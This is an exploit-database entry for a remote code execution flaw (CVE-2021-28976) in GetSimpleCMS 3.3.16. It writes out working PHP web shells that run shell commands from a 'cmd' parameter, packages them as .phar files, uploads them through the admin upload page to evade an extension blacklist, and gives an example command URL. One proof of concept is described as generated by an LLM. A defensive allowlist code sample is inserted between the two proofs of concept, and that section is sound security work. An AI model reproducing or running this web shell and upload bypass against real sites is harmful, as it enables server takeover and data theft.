GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

EDB-ID: 52168
Platform: PHP
Date: 2025-04-11


# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1) Create a .phar file.
1. Create the PHP script: save the following code in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
After running the script, you should find a file named archive.phar in your working directory.

2) Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
2. You can find the file at http://getsimplecms/data/uploads/.

3) Details:
    "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    },
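
Defensive counterpart to the blacklist described in the Details above. This is an added example, not part of the original advisory and not GetSimpleCMS's own code or patch: it replaces the extension blacklist with an allowlist and a server-generated filename. The allowlist contents and the function names are assumptions made for illustration.

```php
<?php
// Added example: hypothetical allowlist validation, not GetSimpleCMS code.
// ALLOWED_EXTENSIONS and both function names are illustrative assumptions.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

/** Return the allowlisted lowercase extension, or null to reject the upload. */
function allowed_extension(string $clientName): ?string
{
    // Keep only the last path component, whatever separator the client sent.
    $base = basename(str_replace('\\', '/', $clientName));
    // Remove control bytes, then trailing dots/spaces that some filesystems
    // drop silently (so "x.phar." would otherwise land on disk as "x.phar").
    $base = rtrim(preg_replace('/[\x00-\x1f\x7f]/', '', $base), '. ');
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    // Strict comparison against the allowlist: anything unknown is refused,
    // so new executable types (phar, phtml, ...) never need to be enumerated.
    return in_array($ext, ALLOWED_EXTENSIONS, true) ? $ext : null;
}

/** Build the on-disk name server-side so no client-chosen text survives. */
function stored_name(string $clientName): ?string
{
    $ext = allowed_extension($clientName);
    if ($ext === null) {
        return null;
    }
    // Random basename also neutralises double extensions like "x.php.png".
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample filenames, including the two names used on this page.
$samples = ['photo.JPG', 'archive.phar', 'exploit.phar', 'shell.pHaR',
            'x.php.png', '.htaccess', 'notes.txt.', 'noextension'];
foreach ($samples as $name) {
    $stored = stored_name($name);
    printf("%-14s %s\n", $name, $stored === null ? 'REJECTED' : "stored as $stored");
}
```

Extension filtering is one layer only; the upload directory should also be served so that the web server never passes its files to the PHP interpreter.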


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar'.
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]